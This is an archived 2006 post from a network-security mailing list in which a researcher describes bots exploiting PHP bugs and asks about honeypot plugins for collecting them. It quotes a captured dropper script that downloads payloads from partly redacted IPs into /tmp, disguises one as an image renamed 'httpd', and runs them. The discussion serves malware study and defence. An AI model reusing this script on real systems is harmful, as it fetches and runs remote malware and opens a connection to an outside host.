Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: new linux malware

from [Jamie Riden] Network Security [Permanent Link]
Subject: Re: new linux malware
Date: Thu, 23 Feb 2006 09:00:13 +1300 
On 21/02/06, Gadi Evron <ge@linuxbox.org> wrote:


Indeed, it has become an annoying trend everybody talks about but nobody
writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either
vulnerabilities in know applications such as WordPress, PHPBB, Drupal,
etc. or actually trying different permutations to attack the site.

<snip>

Anyone else seeing their web server logs going crazy with new patterns
every day? Email me, I am starting a sharing system where these can be
shared mutually so we can better protect ourselves, create signatures, etc.


I got as far as looking at mwcollect and nepenthes to see if anyone
had written plugins to slurp these bots, but couldn't find anything.
Typically they're some sort of variant on:

#!/bin/bash
cd /tmp
wget xxx.yy.105.36/ping
mv ping cb
chmod +x cb
./cb xxx.yyy.233.251 8080 &
killall -9 lordnikonz
wget xxxx052101/images/logo.jpg
mv logo.jpg httpd
rm -rf scripz
chmod +x httpd
export PATH="."
httpd

with payloads being variously identified as Kaiten, Linux.RST and
Lupii by Symantec AV. This is just stuff trying the old awstats
exploit, I haven't coded up any handlers for the xml-rpc, or other
exploits.

So - any handlers/plugins for these? And if so, is anyone (respectable
:) collecting the malware?

cheers,
 Jamie
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  ZDI-06-002: Adobe Macromedia ShockWave Code Execution, zdi-disclosures
Next by Date:  Re: Amazon phishing scam on Yahoo servers, Steve Friedl
Previous by Thread:  [Full-disclosure] Re: new linux malware, Gadi Evron
Next by Thread:  Re: new linux malware, Christine Kronberg
Indexes:  [Date] [Thread] [Top] [All Lists]